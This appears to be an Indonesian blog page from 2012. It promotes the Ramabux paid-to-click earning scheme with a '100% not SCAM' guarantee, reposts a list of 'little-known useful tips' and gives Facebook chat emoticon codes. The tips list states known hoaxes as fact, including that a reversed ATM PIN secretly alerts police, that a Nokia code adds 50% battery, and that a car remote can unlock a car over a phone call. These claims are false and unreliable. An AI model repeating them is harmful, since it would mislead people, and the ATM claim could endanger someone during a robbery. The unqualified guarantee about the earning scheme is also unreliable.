- 30 Detik = Rp. 90
- 40 Detik = Rp. 120

Disini mengharuskan sobat membaca sebuah artikel atau bacaan. Setelah membaca iklan, sobat akan diarahkan menuju website dengan frame Timer atau penghitung. Langkah selanjutnya sama dengan Klik Iklan
 (PTC).


3. Sobat dibayar hanya dengan mendaftar
Nah kalo ini sobat harus melakukan instruksi dari advertiser dengan ketentuan yang telah disepakati. Penghasilan rata-rata per daftar adalah Rp. 1000,-



4. Sobat dibayar hanya dengan mempromosikan link referral sobat
Silahkan bagikan link referral sobat dengan penghitungan per klik:
- Rp. 1 jika sobat member standar
- Rp. 3 jika sobat member premium

Klik yang dihitung hanya dari IP Unik selama 24 jam. Setiap ada yang mendaftar melalui URL Referral sobat , maka sobat berhak untuk mendapatkan:
- 20% dari total penghasilan referral, jika anda anggota standar.
- 100% dari total penghasilan referral, jika anda anggota premium.

5. Sobat dibayar jika melakukan penjualan
Artinya sobat akan dibayar ketika berhasil menjual produk yang ada.

Nah sobat penasaran? silahkan gabung bersama ane di Ramabux disini, dan dijamin 100% Ramabux bukan SCAM!

Oke deh oke...ane yakin deh kalo Ramabux memang legit, lha kapan ane dibayarnya?
Hmm..pertanyaannya sangat mengena sekali, jangan khawatir sob, saat saldo minimal Rp.20.000, uang akan langsung dikirim melalui rekening BCA atau Mandiri dan tanpa potongan...benar-benar luar biasa..

More...

Informasi Berguna yang Jarang Diketahui Orang Mohon Sebarkan


Informasi Berguna yang Jarang Diketahui Orang Mohon Sebarkan - Repost dari tetangga blogger..

1. Nomor darurat untuk telepon genggam adalah 112
Jika sobat sedang di daerah yang tidak menerima sinyal Handphone dan perlu memanggil pertolongan, langkah-langkahnya yaitu silahkan tekan 112, dan Handphone akan mencari secara otomatis network apapun yang ada untuk menyambungkan nomor darurat bagi sobat.
Dan yang menarik, nomor 112 dapat ditekan biarpun keypad dalam kondisi di lock/terkunci.
Catatan: Hanya berlaku untuk nomor GSM saja, sumber disini

2. Kunci mobil sobat ketinggalan di dalam mobil? sobat memakai kunci remote?
Kalau kunci sobat ketinggalan dalam mobil dan remote cadangannya ada di rumah, segera telepon orang rumah dengan HandPhone, lalu dekatkan HandPhone kurang lebih 30cm dari mobil dan minta orang yang ada dirumah untuk menekan tombol pembuka pada remote cadangan yang ada dirumah.
Pada waktu menekan tombol pembuka remote, minta orang rumah mendekatkan remotenya ke telepon yang dipakainya.

3. Battery cadangan darurat khusus NOKIA
Kalau baterai sobat sudah sangat minim padahal sobat sedang menunggu telpon penting atau sedang butuh menelpon dalam kondisi darurat, tapi karna telpon sobat NOKIA… silahkan tekan *3370#, maka telpon anda otomatis restart & baterai akan bertambah 50%.
Baterai cadangan ini akan terisi waktu sobat mencharge HP anda.

4. Tips untuk menge-Check keabsahan mobil/motor sobat. (Khusus wilayah Jakarta)
Ketik : contoh metro B86301O (nomor plat mobil anda) Kirim ke 1717, nanti akan ada balasan dari kepolisian mengenai data-data kendaraan sobat, tips ini juga berguna untuk mengetahui data-data mobil bekas yang hendak dibeli.

5. Jika sobat sedang terancam jiwanya karena dirampok/ditodong seseorang untuk mengeluarkan uang dari atm, maka sobat bisa minta pertolongan diam-diam dengan memberikan nomor pin secara terbalik, misal no asli pin sobat 1254 input 4521 di atm maka mesin akan mengeluarkan uang juga tanda bahaya ke kantor polisi tanpa diketahui pencuri tersebut.
Fasilitas ini tersedia di seluruh atm tapi hanya sedikit orang yang tahu.

Jika posting ini berguna, silahkan sobat sebarkan ke teman-teman yang lain. Makasih..

More...

Minggu, 08 Januari 2012

Cool Facebook Chat Trick | Chat Unik di Facebook

Cool Facebook Chat Trick | Chat Unik di Facebook - Sobat raseco, pastinya sobat sering dong chatting via Facebook..nah hiasi chat Facebook sobat dengan kiriman chat yang unik. Mau mencoba Cool Facebook Chat Trick | Chat Unik di Facebook? Pastinya sobat tidak akan mati gaya deh kalo pake trik chat facebook ini, pasti teman sobat akan kaget dan berkata: "wihh kok bisa kayak gitu ? gimana caranya? bantuin dong?"...dll, dsb..:D

Contoh tampilan chat di Facebook:

Cool Facebook Chat Trick | Chat Unik di Facebook

Nah keren kan sob? ini dia caranya, silahkan copy paste di area chat Facebook sobat.

Troll face
[[331399223556184]] [[286042634779174]] [[330023780360758]] [[329237617088409]] [[204120926342364]] [[131297490319188]] [[289987304385341]]
[[295847560451136]] [[278880668827213]] [[260560750675461]] [[264494386943951]] [[208640915887167]] [[270643856326606]] [[334868623190983]] [[263173770411836]]
[[265844723474789]] [[325742447454304]] [[207587629327321]] [[294223273948603]] [[323449457679402]] [[258622847533513]] [[242014162533924]] [[158386917602797]]
[[306019522772134]] [[267712979948966]] [[301751889864065]] [[213122875437139]] [[164020277032670]] [[158735217564918]] [[261124587284685]] [[301991303173149]]
[[114261558693806]] [[113889888730617]] [[316407155046042]] [[316473595041291]] [[346326392049037]] [[284570571589911]] [[298670736837009]] [[186000198162731]]
[[219939044752270]] [[336155773063546]] [[131032267012645]] [[155856061183812]] [[208532722565686]] [[268249169896142]] [[204863289602546]] [[242397452496887]]
[[199766206779497]] [[157903644315266]] [[212393248843131]]

Me Gusta
[[293955833972970]] [[293955850639635]] [[293955873972966]] [[293955920639628]] [[293956017306285]]
[[293956043972949]] [[293956060639614]] [[293956087306278]] [[293956100639610]] [[293956107306276]]
[[293956117306275]] [[293956127306274]] [[293956147306272]] [[293956220639598]] [[293956283972925]]
[[293956303972923]] [[293956327306254]] [[293956350639585]] [[293956370639583]] [[293956450639575]]
[[293956570639563]] [[293956620639558]] [[293956677306219]] [[293956710639549]] [[293956767306210]]

Bitch, please (Yao)
[[179756028790264]] [[131478976968398]] [[314076808615174]] [[206240339463055]] [[159403400834378]]
[[200992799990165]] [[196243973803636]] [[270956806292431]] [[346811212001437]] [[328107453874590]]
[[196721100420672]] [[317586898261340]] [[298140226892101]] [[214914048591653]] [[350101681673756]]
[[123765061073750]] [[245710415498757]] [[243298355738272]] [[138812572897166]] [[149419131833071]]
[[158310927607841]] [[310752072297702]] [[316528255036793]] [[335475163146590]] [[221503331260136]]
[[241781875890038]] [[218268384920510]] [[189509191144351]] [[302618756443499]] [[182961465135557]]
[[206151719471944]] [[223223751088260]] [[158685720904140]] [[249080145157161]] [[310957895604838]]

Forever alone
[[222233554520712]] [[155093667926316]] [[159374644168797]]
[[265556180170509]] [[272006802857159]] [[144596118984229]] [[198806320212294]] [[155432547893166]]
[[239088996160999]] [[293626150673074]] [[203611766392684]] [[214124502002999]] [[268692779851733]]
[[181312795299893]] [[269771269745545]] [[189131527848966]] [[121039688013447]] [[347460675267390]]
[[116007985184523]] [[267703239958069]] [[209491689137152]] [[335109106501612]] [[286053824778978]]
[[140147629431094]] [[286265654759471]] [[208524709231940]] [[135568263223992]] [[265887476807116]]

NYAN CAT
[[265434590178748]] [[164991926934921]] [[209695692449988]] [[250490361685507]] [[278968458819422]] [[349625665051383]] [[205760419511603]]
[[312189672135533]] [[299788346731384]] [[268532783202434]] [[266669970059695]] [[204170799672068]] [[187204144709527]] [[331078983588306]]
[[149240955184679]] [[206407216112871]] [[240669959335314]] [[180619528702085]] [[347768705240557]] [[186661331430535]] [[218646048216424]]
[[344875905539434]] [[328111047214223]] [[323186421038846]] [[157802940990663]] [[159535350818164]] [[296581710385765]] [[271261609598535]]

POKER FACE
[[258968244165876]] [[286666501379430]] [[262520713809098]] [[159049157536013]] [[307904395916212]]
[[225447050864310]] [[209926462425564]] [[138411019605305]] [[221670374577056]] [[154671737968862]]
[[138007062977844]] [[291747794194724]] [[122952454488304]] [[337561022923016]] [[288878907831075]]
[[240630206008013]] [[264223330304357]] [[319462458078703]] [[239286912807413]] [[288721814513254]]
[[265575850170635]] [[345354905481875]] [[209004679185391]] [[259785247417432]] [[159480014157666]]
[[267428346644787]] [[239034746168540]] [[350046018344350]] [[209260572491236]] [[198316980259626]]
[[310959705610393]] [[214054278676095]] [[200638253359905]] [[334455703231303]] [[158066514298630]]

CEREAL GUY
[[293997730635447]] [[293997767302110]] [[293997777302109]] [[293997787302108]] [[293997790635441]]
[[293997800635440]] [[293997810635439]] [[293997820635438]] [[293997837302103]] [[293997863968767]]
[[293997870635433]] [[293997897302097]] [[293997913968762]] [[293997943968759]] [[293997960635424]]
[[293997973968756]] [[293998003968753]] [[293998027302084]] [[293998043968749]] [[293998113968742]]
[[293998137302073]] [[293998150635405]] [[293998163968737]] [[293998197302067]] [[293998213968732]]

Jackie
[[159403400834378]] [[350711854942596]] [[181587845273907]] [[158684234236177]] [[351037108247221]] [[200627473361428]]
[[319903324706941]] [[296000840437382]] [[120826078035368]] [[197216497039069]] [[160081354096525]] [[293380127365491]]
[[268119093246586]] [[304021742976441]] [[241231115950237]] [[319494974748104]] [[346830568677550]] [[206278946125685]]
[[165619636871866]] [[327492260603305]] [[212797055468932]] [[331257773559487]] [[219749661438887]] [[298440666864927]]

Mother of God
[[159403400834378]] [[301770873198029]] [[124123621037582]] [[165443303555885]] [[225009720907841]] [[159403400834378]]
[[143280719116554]] [[325784210773649]] [[240857172651089]] [[326582487367063]] [[243056889098166]] [[159403400834378]]
[[100126866775028]] [[344748918884490]] [[198318970262933]] [[264742153562246]] [[156223974480296]] [[199239846833770]]
[[337718332906919]] [[159071504197585]] [[159142267522981]] [[285550151496203]] [[217302108349366]] [[243642895706612]]
[[159403400834378]] [[297037847004108]] [[273779062680713]] [[206014099486621]] [[329969420355991]] [[222842284460715]]

Kode lain:
[[171108522930776]] ---->Troll Face
[[164413893600463]]---->Megusta
[[218595638164996]] ---->Yao
[[189637151067601]]----> Lol
[[129627277060203]]----> Poker face.
[[227644903931785]] ---->Forever Alone.
[[100002752520227]]----> Okay
[[105387672833401]]----> F**k Yea.
[[100002727365206]] ---->Ch Ac.
[[125038607580286]]----> Forever Alone Navidad.
[[143220739082110]] ---->Fk Kidding Me.
[[168040846586189]] ---->Feel Like A Sir.
[[169919399735055]] ---->Not Bad
[[142670085793927]]----> M O G.
[[170815706323196]]----> Cereal Guy
[[167359756658519]]----> No
[[224812970902314]]----> Derp
[[192644604154319]]----> Derpina
[[ForeverAloneComics]]----> Forever Alone
[[MeGustaMeme]] ---->Megusta
[[164413893600463]] ---->Megusta 2
[[149333368464171]] ---->YaoMing
[[116616581692281]] ---->Troll Face
[[145768898802324]] ---->Fuuuus
[[168456309878025]] ---->LOL
[[189637151067601]] ---->LOL 2
[[FapFapFap.B]] ---->Fapfap
[[106043532814443]] ----> Yu No
[[214457085240151]] ---->Nothing To do Here
[[129627277060203]] ---->Poker Faces
[[160723207280093]] ---->You Fucking Kidding Me?
[[ChallengeAcceptado]] ---->Challenge Accepted
[[100002752520227]] ---->Okay
[[105387672833401]] ---->Fuck Yeah
[[224812970902314]] ---->Derp
[[192644604154319]] ---->Derpina
[[170815706323196]] ---->Cereal Guy
[[142670085793927]] ----> Mother Of God
[[168040846586189]] ----> Feel Like A Sir
[[169919399735055]] ---->Not Bad
[[164413893600463]] ---->Me Gusta
[[136446926442912]] ---->Friendster
[[googlechrome]] ----> Google Chrome
[[2231777543]] ----> Twitter
[[87741124305]] ---->Old Youtube Logo
[[2513891999]] ---->New Youtube Logo
[[100001076048283]] ---->Shin-Chan
[[250128751720149]] ---->Domo
[[326134990738733]] ----> Pikachu
[[155393057897143]] ----> Doraemon
[[224502284290679]] ---->Nobita
[[144685078974802]] ----> Mojacko
[[334954663181745]] ---->Spongebob
 [[166456416741199]] ---->Angry Bird
[[120219704713360]] ---->Sonic
[[123363421035031]] ---->Pooh
[[132045620187428]] ---->Piglet
[[147290738648754]] ---->Ultraman
[[40134995667]] ---->Bleach
[[199705483893]] ---->Justin Bieber
[[111751548879681]] ---->Adidas
[[110056482412380]] ---->BoBoiBoy



More...
 

Arsip Blog

Recent Comment

Site Info

My Ping in TotalPing.com

Disclaimer

Artikel dalam blog ini bebas untuk disebarkan, dicopy, diperbanyak, di-reposting, di-reblogging baik dengan atau tanpa mencantumkan sumbernya. Sharing is caring. Salam persahablogan!